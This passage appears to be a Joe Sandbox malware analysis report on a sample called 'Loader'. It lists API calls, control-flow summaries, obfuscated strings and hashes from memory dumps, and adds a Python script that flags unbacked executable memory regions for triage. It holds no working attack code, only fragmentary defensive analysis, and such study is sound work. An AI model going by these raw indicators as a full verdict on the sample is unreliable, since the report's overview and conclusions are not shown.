                                                                            • Opcode Fuzzy Hash: 05f11ef93c9fd039308d4b627234ed690d73a6df0136c70e9dad1d59ae8fdef2
                                                                            • Instruction Fuzzy Hash: 22218272D28556EBDB618FB5C848EAE3A79EFC0F94B01441BF81856390D3398D038BE0

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • __RTC_Initialize.LIBCMT ref: 6E4F7CFE
                                                                              • Part of subcall function 6E4F817B: InitializeSListHead.KERNEL32(6E55D830,6E4F7D08,6E509450,00000010,6E4F7C99,?,?,?,6E4F7EC1,?,00000001,?,?,00000001,?,6E509498), ref: 6E4F8180
                                                                            • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6E4F7D68
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137733316.000000006E4F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E4F0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2137718188.000000006E4F0000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000000.00000002.2137767384.000000006E504000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image
                                                                            • String ID:
                                                                            • API String ID: 3231365870-0
                                                                            • Opcode ID: ca67c0420b6bb73174968e9e754749be7abb93d0855e35df0b0e284d766be07b
                                                                            • Instruction ID: 2b1750d087e8c716e2a1f5227e8e88fc24f43a980b47df07ee0030c19e2f7e7b
                                                                            • Opcode Fuzzy Hash: ca67c0420b6bb73174968e9e754749be7abb93d0855e35df0b0e284d766be07b
                                                                            • Instruction Fuzzy Hash: EE21DE32558641DADF10ABF5C418FEE37A49FEAB6CF110A0FD4402E2C2CF255043C6A2

                                                                            Control-flow Graph

                                                                            Control-flow graph (rendered image omitted): function at 6E4FE300, basic blocks 6E4FE300-6E4FE3AF; a loop that calls GetStdHandle (first with STD_INPUT_HANDLE, -10, shown truncated as 000000F6) and then GetFileType on the returned handle, i.e. CRT standard-handle initialization.
                                                                            APIs
                                                                            • GetStdHandle.KERNEL32(000000F6), ref: 6E4FE34C
                                                                            • GetFileType.KERNELBASE(00000000), ref: 6E4FE35E
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137733316.000000006E4F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E4F0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2137718188.000000006E4F0000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000000.00000002.2137767384.000000006E504000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID: FileHandleType
                                                                            • String ID:
                                                                            • API String ID: 3000768030-0
                                                                            • Opcode ID: d262288d967972e371e9dc5492f57f9a9f3f658adfb788d9b6563ddab112d090
                                                                            • Instruction ID: 834348ff1ca3a29fa50436edac4a1f676d44afb1072d8730eba8b15a0cd15e1d
                                                                            • Opcode Fuzzy Hash: d262288d967972e371e9dc5492f57f9a9f3f658adfb788d9b6563ddab112d090
                                                                            • Instruction Fuzzy Hash: 2511B472104742CAC7208ABE8CDCA127A95A7D7A36B39071FD1B6876F1CF70D5839652

                                                                            Control-flow Graph

                                                                            Control-flow graph (rendered image omitted): entry 00DA0824 runs straight through to 00DA66EA, then calls LoadLibraryW at 00DA6710 (block 00DA66F2-00DA671D) and exits through 00DA6726-00DA6743.
                                                                            APIs
                                                                            • LoadLibraryW.KERNELBASE(00000000), ref: 00DA6710
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2133598941.0000000000DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DA0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_da0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID: LibraryLoad
                                                                            • String ID:
                                                                            • API String ID: 1029625771-0
                                                                            • Opcode ID: c5ae69f608b3eb3c6dea5100d3a0b66ac736fcea94e5c5610f545ceb1b8f7e6c
                                                                            • Instruction ID: 2ec14fc30998a31c4a7212cf467a2ba30c0c1723c9729d0c514c43d3676bca9d
                                                                            • Opcode Fuzzy Hash: c5ae69f608b3eb3c6dea5100d3a0b66ac736fcea94e5c5610f545ceb1b8f7e6c
                                                                            • Instruction Fuzzy Hash: F22124B1C0065ADBCB10CF9AC544B9EFBF4FB48720F14816AE918A3340D7B4A900CFA5
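The LoadLibraryW and CloseHandle stubs above live in the 00DA0000 region, which the report marks "based on PE: false", while the CRT routines live in the image-backed module at 6E4F0000. The dump file names encode why: the region's page protection and memory type. The following is an added example, not code from Joe Sandbox or from this report, that decodes the two dump names quoted on this page and flags executable memory that no on-disk image backs (the usual home of unpacked or injected code). The field layout is an assumption inferred from the two names: field 3 as base address, field 4 as the Win32 PAGE_* protection, field 6 as the MEMORY_BASIC_INFORMATION.Type value; the remaining fields are kept raw and not interpreted.

```python
"""Decode Joe Sandbox memory-dump file names and flag unbacked executable regions.

Added example; not part of the Joe Sandbox report or toolset. ASSUMPTION: the
dot-separated field layout (field 3 = region base address, field 4 = Win32 page
protection, field 6 = MEMORY_BASIC_INFORMATION.Type) is inferred from the two
dump names quoted in this report. Fields 0, 1, 2, 5 and 7 are kept raw.
"""
from dataclasses import dataclass

# Win32 PAGE_* protection constants (winnt.h); the low byte of the protection field.
PAGE_PROTECTIONS = {
    0x01: "PAGE_NOACCESS",
    0x02: "PAGE_READONLY",
    0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY",
    0x10: "PAGE_EXECUTE",
    0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE",
    0x80: "PAGE_EXECUTE_WRITECOPY",
}
EXECUTABLE_MASK = 0x10 | 0x20 | 0x40 | 0x80

# MEMORY_BASIC_INFORMATION.Type values (winnt.h).
MEM_IMAGE = 0x01000000
MEM_TYPES = {
    0x00020000: "MEM_PRIVATE",
    0x00040000: "MEM_MAPPED",
    MEM_IMAGE: "MEM_IMAGE",
}


@dataclass(frozen=True)
class DumpRegion:
    base: int
    protect: int
    mem_type: int
    raw_fields: tuple

    @property
    def protect_name(self) -> str:
        return PAGE_PROTECTIONS.get(self.protect & 0xFF, f"0x{self.protect:X}")

    @property
    def type_name(self) -> str:
        return MEM_TYPES.get(self.mem_type, f"0x{self.mem_type:X}")

    @property
    def executable(self) -> bool:
        return bool(self.protect & EXECUTABLE_MASK)

    @property
    def image_backed(self) -> bool:
        return self.mem_type == MEM_IMAGE


def decode_dump_name(name: str) -> DumpRegion:
    """Parse '<f0>.<f1>.<f2>.<base>.<protect>.<f5>.<type>.<f7>.sdmp' (assumed layout)."""
    stem, ext = name.rsplit(".", 1)
    if ext != "sdmp":
        raise ValueError(f"not a .sdmp dump name: {name}")
    fields = stem.split(".")
    if len(fields) != 8:
        raise ValueError(f"expected 8 dot-separated fields, got {len(fields)}: {name}")
    return DumpRegion(
        base=int(fields[3], 16),
        protect=int(fields[4], 16),
        mem_type=int(fields[6], 16),
        raw_fields=tuple(fields),
    )


def is_unbacked_executable(region: DumpRegion) -> bool:
    """Executable pages with no image backing: where unpacked or injected code lives."""
    return region.executable and not region.image_backed


def triage(names):
    """Return (hex base, protection, type, flagged) rows, flagged regions first."""
    rows = []
    for name in names:
        r = decode_dump_name(name)
        rows.append((f"{r.base:08X}", r.protect_name, r.type_name, is_unbacked_executable(r)))
    return sorted(rows, key=lambda row: not row[3])


# Input: the two dump names quoted in this report (taken from the page, not fabricated).
REPORT_DUMPS = [
    "00000000.00000002.2133598941.0000000000DA0000.00000040.00000800.00020000.00000000.sdmp",
    "00000000.00000002.2137733316.000000006E4F1000.00000020.00000001.01000000.00000007.sdmp",
]

if __name__ == "__main__":
    for base, prot, typ, flagged in triage(REPORT_DUMPS):
        print(f"{base}  {prot:<24} {typ:<12} {'UNBACKED EXECUTABLE' if flagged else ''}")
```

Run against the two names, the 00DA0000 region decodes as PAGE_EXECUTE_READWRITE plus MEM_PRIVATE and is flagged, matching the report's "based on PE: false" and the injection-related signatures in the overview; the 6E4F1000 region is PAGE_EXECUTE_READ plus MEM_IMAGE, a normally mapped module, matching "based on PE: true". The same rule applies to a live process via VirtualQueryEx, where private or mapped RWX/RX regions are the first thing to dump.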

                                                                            Control-flow Graph

                                                                            Control-flow graph (rendered image omitted): second entry point 00DA6698 into the same LoadLibraryW stub (call at 00DA6710, exit 00DA6726-00DA6743).
                                                                            APIs
                                                                            • LoadLibraryW.KERNELBASE(00000000), ref: 00DA6710
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2133598941.0000000000DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DA0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_da0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID: LibraryLoad
                                                                            • String ID:
                                                                            • API String ID: 1029625771-0
                                                                            • Opcode ID: fc9b655fcf8705545730f1409f903ae3977b6d628741b09a8f444e08676d1cd9
                                                                            • Instruction ID: 7d2f1339cab413078e0fd2a3ce82f3780d93ea088ebb782ea8290fbc7217e129
                                                                            • Opcode Fuzzy Hash: fc9b655fcf8705545730f1409f903ae3977b6d628741b09a8f444e08676d1cd9
                                                                            • Instruction Fuzzy Hash: 89112FB1C0065A9BDB10CFAAC844B9EFBF4BB48720F14816AE918A3340D774A900CFA1

                                                                            Control-flow Graph

                                                                            Control-flow graph (rendered image omitted): entry 00DA5424 runs through to 00DA6A9C calling CloseHandle at 00DA6A8F, then exits through 00DA6AA5-00DA6ACD.
                                                                            APIs
                                                                            • CloseHandle.KERNELBASE(00000000), ref: 00DA6A8F
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2133598941.0000000000DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DA0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_da0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID: CloseHandle
                                                                            • String ID:
                                                                            • API String ID: 2962429428-0
                                                                            • Opcode ID: 30aa1e1a77f70a1ede85d3ad972759661dcd6d67bd4657c2b1606f43176dfb1b
                                                                            • Instruction ID: 7e3ca80ff30bc98c46cdc97ebe018ac423eab4caa4bc9798a4c336cae760c5b9
                                                                            • Opcode Fuzzy Hash: 30aa1e1a77f70a1ede85d3ad972759661dcd6d67bd4657c2b1606f43176dfb1b
                                                                            • Instruction Fuzzy Hash: B41116B1900749CFDB10DF9AC445BAEBBF4EF48320F248469D558A7340D778A944CBA5

                                                                            Control-flow Graph
                                                                            control_flow_graph 1181 da6a28-da6a9c CloseHandle 1183 da6a9e-da6aa4 1181->1183 1184 da6aa5-da6acd 1181->1184 1183->1184
                                                                            APIs
                                                                            • CloseHandle.KERNELBASE(00000000), ref: 00DA6A8F
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2133598941.0000000000DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DA0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_da0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID: CloseHandle
                                                                            • String ID:
                                                                            • API String ID: 2962429428-0
                                                                            • Opcode ID: 51af26b15a84ed57b2eb05628c04eb35a23fece395728e547ef6f345d2c60906
                                                                            • Instruction ID: 1e7bc778187e02d7a599f2d855621afc6907b5cc9c97196eb526eb06a42ca21d
                                                                            • Opcode Fuzzy Hash: 51af26b15a84ed57b2eb05628c04eb35a23fece395728e547ef6f345d2c60906
                                                                            • Instruction Fuzzy Hash: 121128B6800249CFDB10DF99C5457DEBBF4EF88320F24841AD518A7750D778A944CFA5
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmp, Offset: 6E50B000, based on PE: true
                                                                            • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: $!by*$$$)*+$$123X$1X74$45$5670$;:54$=n=c$H$PQRS$Xqrs$\]^_$`abc$eyv$sDK}$vv@
                                                                            • API String ID: 0-744883782
                                                                            • Opcode ID: b717fa412420b32593f985657e3a8566e7a3a9fbde863e76e74dd9bba23145a6
                                                                            • Instruction ID: 21e3f0578135ec740aef7401ade4f9945b34ed28e1defd3c5d1cd4a537b73abb
                                                                            • Opcode Fuzzy Hash: b717fa412420b32593f985657e3a8566e7a3a9fbde863e76e74dd9bba23145a6
                                                                            • Instruction Fuzzy Hash: C4B2CE7150C3818FE765CF65C8907ABBBE2AFD6304F18892CE5D98B392E7748409CB52
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmp, Offset: 6E50B000, based on PE: true
                                                                            • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: '$($2$6$<$<$>$>$?$?$D$I$}$~
                                                                            • API String ID: 0-1549446310
                                                                            • Opcode ID: 367a348c16854c040ed8a8e1c50337844c82badbceb661a6883815d7b6a28ffd
                                                                            • Instruction ID: 5423c3c856f095a2f45c2705830182e25da5954703633015ab767e6198a73564
                                                                            • Opcode Fuzzy Hash: 367a348c16854c040ed8a8e1c50337844c82badbceb661a6883815d7b6a28ffd
                                                                            • Instruction Fuzzy Hash: 5BB1177395D7E18AE31189BD884524BEED21BD7228F1ECB6DD4E4873C6C569C8078393
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmp, Offset: 6E50B000, based on PE: true
                                                                            • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 0$0$0$0000$0000$0000$0000$0000$0000$0000$@$i
                                                                            • API String ID: 0-3385986306
                                                                            • Opcode ID: 463e9afdf012da67d84867e87a37cec8d83071b3943f87856e8a01a6767cd0ff
                                                                            • Instruction ID: 376b6ae54a1b0fcb11f4fcd454dd7519567de9a65f3b1b97ac1966fdd7e264f7
                                                                            • Opcode Fuzzy Hash: 463e9afdf012da67d84867e87a37cec8d83071b3943f87856e8a01a6767cd0ff
                                                                            • Instruction Fuzzy Hash: 3C82C27560D3828FD345CF68C49036ABBE1AB86704F18CA6DF4DA9B395D334D905CBA2
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmp, Offset: 6E50B000, based on PE: true
                                                                            • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 9tWU$<194$ALC:$JHz~$UQGq$UW$^$^\V^
                                                                            • API String ID: 0-3233791986
                                                                            • Opcode ID: 1b76c00ea30690e806b229d34a8721d4fbe8444d2ee39c48be022f5bad116e41
                                                                            • Instruction ID: 94d41b4c84d66dd40feaf4bb1fbb37522f12e781b480a115aea537194f883b97
                                                                            • Opcode Fuzzy Hash: 1b76c00ea30690e806b229d34a8721d4fbe8444d2ee39c48be022f5bad116e41
                                                                            • Instruction Fuzzy Hash: 7A91AD7150D3918FD311CF69D4507AABFE0AF86704F08899CE4E99B392D735C90ACB96
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmp, Offset: 6E50B000, based on PE: true
                                                                            • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: &%9b$)vBW$*#1/$9&!:$s$>%$sp$.$x$x|."
                                                                            • API String ID: 0-2964809603
                                                                            • Opcode ID: e15111653fabfa8ae9ca1ff26d6d509ab9527342194df1257f5b8c1e77c5e471
                                                                            • Instruction ID: 3169dd4b7ecdc02e914d0baba360f0333f630348aa85bffdcbb04d5a44cbdbf0
                                                                            • Opcode Fuzzy Hash: e15111653fabfa8ae9ca1ff26d6d509ab9527342194df1257f5b8c1e77c5e471
                                                                            • Instruction Fuzzy Hash: E851B37410D3818BE345CF69D4A07ABBFE1EF93305F1499ACE4D14B291D37A890ACB62
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmp, Offset: 6E50B000, based on PE: true
                                                                            • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: $ $ $ $ $ $
                                                                            • API String ID: 0-935225467
                                                                            • Opcode ID: 7e3a9054b10ffa9b6b3e2b3cb611ff28d6c3ce50e1f1add8480a7a6e7f949604
                                                                            • Instruction ID: e652387e89e7cc3a5ef75aed893f4b1c343331e5b69ea239c122bd096cbc8b22
                                                                            • Opcode Fuzzy Hash: 7e3a9054b10ffa9b6b3e2b3cb611ff28d6c3ce50e1f1add8480a7a6e7f949604
                                                                            • Instruction Fuzzy Hash: 44A2F3716083428FD744CE68C4A037ABBE2AFD6314F188A6DF4A58B395E774D945CF82
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmp, Offset: 6E50B000, based on PE: true
                                                                            • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Lk$U\$Zb$\_$`$
                                                                            • API String ID: 0-227298061
                                                                            • Opcode ID: 80a7465b240ceaba27d8fd7acd63200aa4daaaec9e5f50990578a8dd437069c5
                                                                            • Instruction ID: 3fb97d79265db314ac7a20647249a2e73ac6cc79603b5f30bfec1397d3939419
                                                                            • Opcode Fuzzy Hash: 80a7465b240ceaba27d8fd7acd63200aa4daaaec9e5f50990578a8dd437069c5
                                                                            • Instruction Fuzzy Hash: FD81BCB124C3808FE310DF65D49079FBBE6EBC2314F14892DE1D58B291DB7985068B97
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmp, Offset: 6E50B000, based on PE: true
                                                                            • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: ;:54$;:54$InA>$InA>$f
                                                                            • API String ID: 0-3857589079
                                                                            • Opcode ID: 736774bc0e92679049245a31f393efb7e22c33ca206622e3b3a5f049b5afa705
                                                                            • Instruction ID: a17cb8746d3da8d0d5d719d36fd24e5c811ed4eb589c46d7369d2ff3ddb744fb
                                                                            • Opcode Fuzzy Hash: 736774bc0e92679049245a31f393efb7e22c33ca206622e3b3a5f049b5afa705
                                                                            • Instruction Fuzzy Hash: EC32F472609342DFD304CF59C991B6BBBE6ABC9314F18CA2CE9A587394D774D805CB82
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmp, Offset: 6E50B000, based on PE: true
                                                                            • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: ){zy$)6$)B$|~$sq
                                                                            • API String ID: 0-2449703377
                                                                            • Opcode ID: ed205e49c4bd9890f08ba96f0ac492bda30eae2a3fd5dfea669e1982a0e0cea3
                                                                            • Instruction ID: aac39aa87705703aad15f697b4275a27cf35afb2dcb41dc343aeabb54ee4997d
                                                                            • Opcode Fuzzy Hash: ed205e49c4bd9890f08ba96f0ac492bda30eae2a3fd5dfea669e1982a0e0cea3
                                                                            • Instruction Fuzzy Hash: 69C1CEB15183118FD325CF29C89276BB7F1EF92354F148A2CE4D68B394EB399805CB92
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmp, Offset: 6E50B000, based on PE: true
                                                                            • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 52$\XTR$`a$f\nf$ngfa
                                                                            • API String ID: 0-1621357096
                                                                            • Opcode ID: 81ba660202492963c212c2fa93238453fc0233941f7c7c91ec69b3c465225053
                                                                            • Instruction ID: e8bacb187227d7857645447243b0ba002bc82f91b599ea285404308ae307e9d8
                                                                            • Opcode Fuzzy Hash: 81ba660202492963c212c2fa93238453fc0233941f7c7c91ec69b3c465225053
                                                                            • Instruction Fuzzy Hash: 81D1047560C3918BE344CE6984A13ABFBE1AFC1714F18C92DE4E59B281D779C906CB92
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmp, Offset: 6E50B000, based on PE: true
                                                                            • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: OI$RR$_W$us$}z{
                                                                            • API String ID: 0-1570830214
                                                                            • Opcode ID: 60bd2e07e64cdd6ec4ca63b18d80e27c1dbffe6ba89b33d60cedce7f0764e81a
                                                                            • Instruction ID: a28a73857e1db598291edc6a7909dc9cba7e020f745e2d1b4599736b2697d9bd
                                                                            • Opcode Fuzzy Hash: 60bd2e07e64cdd6ec4ca63b18d80e27c1dbffe6ba89b33d60cedce7f0764e81a
                                                                            • Instruction Fuzzy Hash: 21D134B2A117458FCB14CFA9C88029ABFF2FF85314F18CA6CD4946B385D7789946CB90
                                                                            APIs
                                                                            • IsProcessorFeaturePresent.KERNEL32(00000017,00000000), ref: 6E4F84A6
                                                                            • IsDebuggerPresent.KERNEL32 ref: 6E4F8572
                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6E4F858B
                                                                            • UnhandledExceptionFilter.KERNEL32(?), ref: 6E4F8595
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137733316.000000006E4F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E4F0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2137718188.000000006E4F0000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000000.00000002.2137767384.000000006E504000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                            • String ID:
                                                                            • API String ID: 254469556-0
                                                                            • Opcode ID: 517d8b3aa01929e6b993549fbee085f7fda8a1ac3e2eb292a11d6896df701288
                                                                            • Instruction ID: 29e8a2477c6bef7be4c78104310146406554d02c8ae80e3a8731aa5900ea04c6
                                                                            • Opcode Fuzzy Hash: 517d8b3aa01929e6b993549fbee085f7fda8a1ac3e2eb292a11d6896df701288
                                                                            • Instruction Fuzzy Hash: 6A31F7B5D05218DBDF10DFA5D989BCDBBB8AF48704F1041AAE40CAB240EB709B858F85
                                                                            APIs
                                                                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 6E4FC552
                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 6E4FC55C
                                                                            • UnhandledExceptionFilter.KERNEL32(C00000EF,?,?,?,?,?,00000000), ref: 6E4FC569
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137733316.000000006E4F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E4F0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2137718188.000000006E4F0000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000000.00000002.2137767384.000000006E504000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                            • String ID:
                                                                            • API String ID: 3906539128-0
                                                                            • Opcode ID: 67a49a8d0c2c16bcc42631a3af3ea57c8555f3defbf407be01a1d75ad750fdc0
                                                                            • Instruction ID: 61765d12401b1214d6ee87232d1c2c9d18229716d5f438d3703dcfc715ad4791
                                                                            • Opcode Fuzzy Hash: 67a49a8d0c2c16bcc42631a3af3ea57c8555f3defbf407be01a1d75ad750fdc0
                                                                            • Instruction Fuzzy Hash: AD31E774901228DBCB21DF65D888BCDB7B8BF58710F5045DAE41CAB290EB309B828F44
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmp, Offset: 6E50B000, based on PE: true
                                                                            • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: ;:54$;:54$s}
                                                                            • API String ID: 0-2837035532
                                                                            • Opcode ID: 8521f6ecfd962c45bded9db9fa15a38b11263f397f2fc75af69b06a5baf338c7
                                                                            • Instruction ID: 00627b47c442082400c2a518c43fca8db78cad890a39227f2e95f4d9ae1353d3
                                                                            • Opcode Fuzzy Hash: 8521f6ecfd962c45bded9db9fa15a38b11263f397f2fc75af69b06a5baf338c7
                                                                            • Instruction Fuzzy Hash: 7D22D0B16083419FE760DFA4C891B6BB7E6EBC6704F14883CE6C59B292D774D841CB92
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmp, Offset: 6E50B000, based on PE: true
                                                                            • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: )$)$IEND
                                                                            • API String ID: 0-588110143
                                                                            • Opcode ID: 5e990ce4fac7296d1d108adde10aa6021813bdf602cdc4fc0c2b25e57719d51f
                                                                            • Instruction ID: cd0e51fd1bc4efe69dd6858e430630e57ebd65a67d2138815a400800dbe7c8cf
                                                                            • Opcode Fuzzy Hash: 5e990ce4fac7296d1d108adde10aa6021813bdf602cdc4fc0c2b25e57719d51f
                                                                            • Instruction Fuzzy Hash: 6EF1E175A0C701AFE304CF68C89479ABBE4FB86308F044A2DEA9597381D774E914DBC2
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmp, Offset: 6E50B000, based on PE: true
                                                                            • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
